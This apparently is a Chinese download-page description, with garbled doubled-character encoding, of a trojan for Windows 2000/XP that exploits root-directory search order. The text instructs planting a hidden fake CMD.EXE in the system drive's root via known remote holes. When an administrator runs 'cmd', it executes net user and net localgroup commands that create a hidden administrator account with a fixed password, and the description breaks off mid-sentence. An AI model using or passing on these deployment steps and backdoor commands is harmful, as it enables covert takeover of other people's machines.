你是不是經(jīng)常在開始菜單的運(yùn)行窗口里運(yùn)行命令呢? 看看這個(gè)漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在執(zhí)行搜索的時(shí)候, 首先查找根目錄 而開始菜單的運(yùn)行窗口里執(zhí)行命令, 也是首先在系統(tǒng)盤的根目錄里進(jìn)行查找. 這個(gè)漏洞其實(shí)是已經(jīng)是公開的秘密了. 既然現(xiàn)在作為漏洞公布出來, 我也就把網(wǎng)上的PasswordReminder.cpp拿來改了改 加了一個(gè)加超級管理員用戶和執(zhí)行cmd.exe的功能. 使用方法: 把程序解壓, 把壓縮包里的文件 CMD.EXE (該文件具有隱藏和只讀屬性) 釋放到目標(biāo)機(jī)器的系統(tǒng)盤根目錄, 一般都是在C:比如利用UNICODE/Decode漏洞就有寫根目錄的權(quán)限, 同時(shí)Asp/fp30reg.dll等遠(yuǎn)程溢出出來的Shell, 一般都只有匿名權(quán)限, 但是它具有寫根目錄的權(quán)限 這個(gè)時(shí)候, 就可以把本程序放到目標(biāo)機(jī)器的系統(tǒng)盤根目錄 只要等管理員在機(jī)器的開始菜單里運(yùn)行命令: cmd 一切盡在掌握中.:) PS: 系統(tǒng)執(zhí)行后, 會(huì)先產(chǎn)生一個(gè)線程來做一些處理 然后用system()函數(shù)調(diào)用cmd.exe來讓用戶能夠執(zhí)行命令. 產(chǎn)生出來的線程會(huì)產(chǎn)生兩個(gè)進(jìn)程序執(zhí)行如下兩個(gè)命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 這樣就在系統(tǒng)上增加了一個(gè)超級
標(biāo)簽:
964057
zdnet
http
2100
上傳時(shí)間:
2015-01-12
上傳用戶:qlpqlq